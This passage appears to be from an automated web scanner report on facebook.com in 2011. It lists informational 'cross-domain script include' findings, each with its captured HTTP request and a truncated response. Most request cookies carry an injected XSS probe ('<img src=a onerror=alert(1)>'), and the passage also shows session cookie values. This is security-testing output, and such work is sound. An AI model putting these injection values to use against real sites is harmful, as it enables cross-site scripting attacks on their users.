Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.57
Connection: close
Date: Thu, 05 May 2011 11:42:21 GMT
Content-Length: 77523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.36. http://www.facebook.com/directory/pages/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/pages/

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.51
Connection: close
Date: Thu, 05 May 2011 11:42:59 GMT
Content-Length: 44671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.37. http://www.facebook.com/directory/people/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/people/

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.25
Connection: close
Date: Thu, 05 May 2011 11:42:57 GMT
Content-Length: 34484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.38. http://www.facebook.com/facebook

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /facebook

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.157.59
Connection: close
Date: Thu, 05 May 2011 11:43:00 GMT
Content-Length: 159754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.39. http://www.facebook.com/fayse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /fayse

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /fayse HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffayse; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.21
Connection: close
Date: Thu, 05 May 2011 11:42:45 GMT
Content-Length: 59713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.40. http://www.facebook.com/find-friends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /find-friends HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.218.112
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 101636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/TP-A71t1sFT.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.41. http://www.facebook.com/find-friends

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php; act=1304613654644%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613654661%2C%22act%22%2C1304613654644%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Fmobile%3Fref%3Dpf%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C361%2C635%2C12%2C981%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.188.21
X-Cnection: close
Date: Thu, 05 May 2011 11:43:46 GMT
Content-Length: 101594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/nKcHzwvsYY2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.42. http://www.facebook.com/gale.l.schenk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /gale.l.schenk

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /gale.l.schenk HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fgale.l.schenk; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.65
Connection: close
Date: Thu, 05 May 2011 11:42:46 GMT
Content-Length: 113481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.43. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /help/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.16.121
Connection: close
Date: Thu, 05 May 2011 10:56:37 GMT
Content-Length: 20550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/TP-A71t1sFT.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.44. http://www.facebook.com/help/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /help/?page=432 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; act=1304613664644%2F2; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.83
X-Cnection: close
Date: Thu, 05 May 2011 11:44:03 GMT
Content-Length: 24931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.45. http://www.facebook.com/izaOllie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /izaOllie

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /izaOllie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FizaOllie; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.35
Connection: close
Date: Thu, 05 May 2011 11:42:50 GMT
Content-Length: 101169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.46. http://www.facebook.com/jezzas

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /jezzas

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /jezzas HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fjezzas; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.45
Connection: close
Date: Thu, 05 May 2011 11:42:30 GMT
Content-Length: 74561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

17.47. http://www.facebook.com/kimberly.christ

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /kimberly.christ

Issue detail

The response dynamically includes the following script from another domain:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /kimberly.christ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
